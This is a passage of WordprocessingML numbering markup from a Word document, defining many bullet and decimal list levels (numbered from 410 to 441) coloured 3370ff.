    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22252">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22253">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22254">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22255">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22256">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22257">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22258">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22259">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22260">
    <w:lvl>
      <w:start w:val="410"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22261">
    <w:lvl>
      <w:start w:val="411"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22262">
    <w:lvl>
      <w:start w:val="412"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22263">
    <w:lvl>
      <w:start w:val="413"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22264">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22265">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22266">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22267">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22268">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22269">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22270">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22271">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22272">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22273">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22274">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22275">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22276">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22277">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22278">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22279">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22280">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22281">
    <w:lvl>
      <w:start w:val="414"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22282">
    <w:lvl>
      <w:start w:val="415"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22283">
    <w:lvl>
      <w:start w:val="416"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22284">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22285">
    <w:lvl>
      <w:start w:val="417"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22286">
    <w:lvl>
      <w:start w:val="418"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22287">
    <w:lvl>
      <w:start w:val="419"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22288">
    <w:lvl>
      <w:start w:val="420"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22289">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22290">
    <w:lvl>
      <w:start w:val="421"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22291">
    <w:lvl>
      <w:start w:val="422"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22292">
    <w:lvl>
      <w:start w:val="423"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22293">
    <w:lvl>
      <w:start w:val="424"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22294">
    <w:lvl>
      <w:start w:val="425"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22295">
    <w:lvl>
      <w:start w:val="426"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22296">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22297">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22298">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22299">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22300">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22301">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22302">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22303">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22304">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22305">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22306">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22307">
    <w:lvl>
      <w:start w:val="427"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22308">
    <w:lvl>
      <w:start w:val="428"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22309">
    <w:lvl>
      <w:start w:val="429"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22310">
    <w:lvl>
      <w:start w:val="430"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22311">
    <w:lvl>
      <w:start w:val="431"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22312">
    <w:lvl>
      <w:start w:val="432"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22313">
    <w:lvl>
      <w:start w:val="433"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22314">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22315">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22316">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22317">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22318">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22319">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22320">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22321">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22322">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22323">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22324">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22325">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22326">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22327">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22328">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22329">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22330">
    <w:lvl>
      <w:start w:val="434"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22331">
    <w:lvl>
      <w:start w:val="435"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22332">
    <w:lvl>
      <w:start w:val="436"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22333">
    <w:lvl>
      <w:start w:val="437"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22334">
    <w:lvl>
      <w:start w:val="438"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22335">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22336">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22337">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22338">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22339">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22340">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22341">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22342">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22343">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22344">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22345">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22346">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22347">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22348">
    <w:lvl>
      <w:start w:val="439"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22349">
    <w:lvl>
      <w:start w:val="440"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22350">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22351">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22352">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22353">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22354">
    <w:lvl>
      <w:start w:val="441"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22355">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22356">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
